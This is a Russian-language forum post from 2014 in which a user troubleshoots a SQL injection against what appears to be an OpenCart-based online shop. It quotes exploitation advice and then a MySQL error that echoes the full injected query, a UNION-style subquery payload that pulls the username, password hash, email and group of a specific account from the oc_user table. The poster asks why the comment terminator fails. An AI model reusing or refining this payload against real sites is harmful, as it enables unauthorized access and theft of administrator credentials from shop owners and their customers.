Показать сообщение отдельно

  #11  
Старый 08.07.2014, 17:30
EksTasy
Познающий
Регистрация: 26.10.2008
Сообщений: 61
Провел на форуме:
478326

Репутация: 2
По умолчанию

Цитата:
Сообщение от XAMEHA  
Здесь все как нельзя лучше - инъекция в select_expr. Вы не указали, какие столбцы идут на выход. Если первые идут, то эксплуатация такова:
Должно сработать (при выводе 1, 2, 3, 4, 5 на их место подставляйте свои запросы). Если на выход идет только 6-ой столбец (555) или имеет место что-то ещё - напишите об этом, приведу соответствующую технику.
Цитата:
Сообщение от None  
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'FROM oc_stock s LEFT JOIN oc_stock_description sd ON (s.stock_id = sd' at line 8
Error No: 1064
SELECT s.stock_id, sd.name, sd.address, sd.metro, s.icon, (SELECT IFNULL(SUM(qty),0) FROM oc_stock_product_quantity WHERE stock_id = s.stock_id AND product_id = '37123')-555*-1 as qty FROM (SELECT (SELECT user_id from oc_user where user_id=19471) stock_id, (SELECT username from oc_user where user_id=19471) icon)s JOIN (SELECT (SELECT password from oc_user where user_id=19471) name, (SELECT email from oc_user where user_id=19471) address, (SELECT user_group_id from oc_user where user_id=19471) metro)sd -- ') as qty FROM oc_stock s LEFT JOIN oc_stock_description sd ON (s.stock_id = sd.stock_id) WHERE sd.language_id = '1' AND s.hidden = 0 AND s.sp != 1 AND s.stock_id IN (SELECT st2s.stock_id FROM oc_stock_to_organization AS st2s LEFT JOIN oc_organization_to_store o2s ON (st2s.organization_id = o2s.organization_id) WHERE o2s.store_id = 0) ORDER BY s.sort_order
видимо не хочет воспринимать знак комментария --, либо я что-то неправильно делаю.

конструкция вида -36103 вызывает ощибку "Товар не найден!".
 
Ответить с цитированием